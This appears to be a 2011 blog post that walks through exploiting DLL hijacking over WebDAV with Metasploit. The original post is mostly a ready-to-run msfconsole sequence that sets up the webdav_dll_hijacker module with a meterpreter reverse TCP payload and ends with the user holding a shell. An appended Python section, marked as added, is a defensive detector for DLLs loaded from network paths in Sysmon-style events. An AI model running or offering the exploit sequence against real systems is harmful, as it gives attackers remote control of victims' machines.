Saturday, 30 April 2011

DLL Hijacking

This vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files.
Usually, the user has to browse into the directory and open a file; this can be any file, even a blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory, which here is the remote share, and then we get our
shell. So let's do this one.

1) Open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME reports
msf> set EXTENSIONS grp
msf> set LHOST 192.168.1.69
msf> set SRVHOST 192.168.1.69
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now, go to the client, browse to file://192.168.1.69/ and click on any file.
Done, you have your shell.
msf> sessions

Now, go to this website to see the list of all apps that are vulnerable:
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
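
On the defensive side, the load described above is visible in image-load telemetry: a locally installed program pulls a DLL from a network path. The following is an added example, not part of the original post; it assumes records carrying the Image, ImageLoaded and Signed fields of Sysmon Event ID 7, and every path and DLL name in the sample data is constructed.

```python
import ntpath

# Constructed sample records (not real telemetry) using the Image, ImageLoaded
# and Signed field names of Sysmon Event ID 7 (image loaded).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"\\192.168.1.69\documents\example.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"\\fileserver@8080\DavWWWRoot\docs\example.dll", "Signed": "false"},
    {"Image": r"\\192.168.1.69\documents\setup.exe",
     "ImageLoaded": r"\\192.168.1.69\documents\setup_helper.dll", "Signed": "false"},
]

def classify(path):
    """Return 'local', 'unc' or 'webdav' for a Windows path."""
    if path.upper().startswith("\\\\?\\UNC\\"):
        path = "\\\\" + path[8:]          # \\?\UNC\srv\share -> \\srv\share
    if not path.startswith("\\\\") or path[2:4] in ("?\\", ".\\"):
        return "local"                    # drive path or \\?\C:\ device form
    host, _, rest = path[2:].partition("\\")
    share = rest.split("\\", 1)[0]
    # WebDAV paths usually carry host@port / host@SSL or a DavWWWRoot share;
    # a WebDAV share on port 80 may look like plain UNC and is still flagged.
    if "@" in host or share.lower() == "davwwwroot":
        return "webdav"
    return "unc"

def remote_dll_loads(events):
    """Flag DLLs that a locally installed program loaded from a network path."""
    findings = []
    for ev in events:
        origin = classify(ev["ImageLoaded"])
        # A program started from the share loading a DLL beside itself is a
        # different case; only local programs loading remote DLLs are flagged.
        if origin == "local" or classify(ev["Image"]) != "local":
            continue
        findings.append({
            "process": ntpath.basename(ev["Image"]),
            "dll": ev["ImageLoaded"],
            "origin": origin,
            "signed": ev.get("Signed", "").lower() == "true",
        })
    return findings

if __name__ == "__main__":
    for f in remote_dll_loads(SAMPLE_EVENTS):
        print(f"{f['origin']:6} {f['process']} <- {f['dll']}")
```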
